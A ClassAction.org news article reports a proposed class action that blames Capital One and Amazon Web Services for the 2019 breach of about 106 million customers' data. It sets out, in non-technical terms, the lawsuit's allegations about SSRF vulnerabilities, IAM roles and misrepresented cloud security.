New Class Action Over 2019 Capital One Data Breach Centers on ‘Known Vulnerabilities’ Unaddressed by Amazon Web Services

New to ClassAction.org? Read our Newswire Disclaimer

Five plaintiffs allege in a proposed class action that “known vulnerabilities” within Amazon Web Services’ cloud storage environment played a major role in the massive 2019 Capital One data breach that affected—and continues to affect—more than 106 million consumers. 

The 84-page lawsuit out of Virginia federal court blames the much-publicized breach, in which former Amazon employee Paige A. Thompson was able to access and surreptitiously view, remove and publicize consumers’ private data, on Capital One and Amazon Web Services’ alleged failure to timely address cybersecurity vulnerabilities that were no secret to the companies after the bank moved its data to Amazon’s public cloud in 2015. 

Although Capital One attempted to convince customers that their data, which would no longer be in the bank’s physical custody, would be safe on Amazon Web Service’s cloud, the defendants ultimately misrepresented how risky the shift actually was, the lawsuit alleges. 

“For this move to work, Capital One would have to convince its present and prospective customers that their information would be safe,” the complaint reads. “With this in mind, both Capital One and AWS charted a course to make deceptive, false, misleading and unfair representations regarding the collection of customer data sitting on the public cloud.” 

According to the suit, Capital One moved customers’ sensitive data to a cloud environment that “has long suffered from a widely known flaw,” namely that Amazon Web Services’ servers, apparently unlike those of competitors, were not secured against server side request forgery (SSRF) attacks. In an SSRF attack, the suit says, an intruder is able to penetrate a firewall and exfiltrate data to a third-party server. According to the lawsuit, the subject of SSRF attacks, and particularly Amazon’s servers’ vulnerability to such, have been expressly discussed within the cybersecurity industry. 

Amazon Web Services’ servers, the lawsuit says, are configured to allow different web applications to draw from their vast collection of data, but also allow for “the configuration of access ‘policies’ to allow the application to only pull the data it needs” using, for instance, identity and access management (IAM) roles. Per the case, an IAM role is an identity created in an account that has specific permissions that determine what the identity can and cannot do within Amazon Web Services. Unlike usernames and person-specific credentials, an IAM role is intended to be assumable by anyone who needs it and can be used to delegate Amazon Web Services access to users, applications or services “that do not normally have access to the restricted AWS data, or resources, stored by the owner of the cloud.” 

Whereas IAM roles work to regulate access to data within Amazon Web Services servers, the only defense against protecting the information from outside access is a firewall, an effective shield between a server and traffic originating from the outside, the lawsuit says. A firewall not only blocks unauthorized access to a server while permitting authorized access and outward communication, but also distinguishes between legitimate and illegitimate access requests, the case relays. Legitimate firewall access requests are automatically assigned a “role” that establishes the portions of the server the individual on the other end will have access to, as well as the conditions of that access, per the suit. 

According to the lawsuit, the firewalls used on the Amazon Web Services cloud “are known to be vulnerable to an SSRF attack,” wherein an unauthorized party tricks a server’s firewall into thinking they are permitted to request and access data. This is all an attacker needs to gain a foothold inside a targeted network, the suit stresses. 

The plaintiffs say that although an SSRF attack was a well-known tactic employed by hackers, Amazon Web Services had “no protections built into its systems to protect against an SSRF attack” around the time of the summer 2019 Capital One data breach. Instead, because Amazon relied on IAM roles to control access to “sensitive resources,” the suit claims, an attacker who could gain access to a resource behind an Amazon firewall could then assume a privileged IAM role and “gain access to whatever data the role can access.” 

The defendants—Capital One Financial Corporation; Capital One Bank (USA) N.A.; Capital One, N.A.; Amazon.com, Inc.; and Amazon Web Services, Inc.—represented to the public that a new tool they jointly developed, called Cloud Custodian, had addressed the inherent SSRF vulnerabilities on Amazon’s cloud, the lawsuit says, explaining that the tool would encrypt every piece of data and automatically scan the bank’s systems to ensure all servers and permissions were set according to defined policies. This is not what happened, the lawsuit says: 

“But encrypting the data stored on the AWS servers did not solve the security vulnerability. Credentials assigned with IAM roles automatically decrypt the data the role is allowed to access. Therefore, if an intruder is able to gain access to an IAM role and get past the firewall, the IAM role will decrypt the data, allowing the unauthorized user access to unencrypted data. In other words, one key unlocks both sets of doors—the firewall and the encryption.” 

On July 29, 2019, Capital One announced in a Securities and Exchange Commission filing that it had experienced a data breach affecting 100 million people in the United States and approximately six million in Canada, the lawsuit goes on. The perpetrator, a former Amazon Web Services system engineer, was able to gain access to sensitive Capital One data by going through a misconfigured firewall the bank was using as part of its cloud operations with Amazon, the complaint says. The incident went undiscovered by the defendants despite the fact that the perpetrator posted publicly about it on Twitter and other social media sites over the course of several months and that Capital One had records of the unauthorized intrusion, the case states. 

Despite Capital One and Amazon’s assurances to the contrary, vast amounts of personal data was and remains dangerously exposed and vulnerable to theft and fraud, the suit alleges. 

Consumer and small business data stolen in the breach included names, addresses, zip codes, phone numbers, email addresses, dates of birth, self-reported income figures, roughly 140,000 Social Security numbers, 80,000 bank account numbers, credit scores, credit card limits and balances, payment histories and fragments of transaction data from 2016, 2017 and 2018, the suit says. 

Get class action lawsuit news sent to your inbox – sign up for ClassAction.org’s free weekly newsletter here.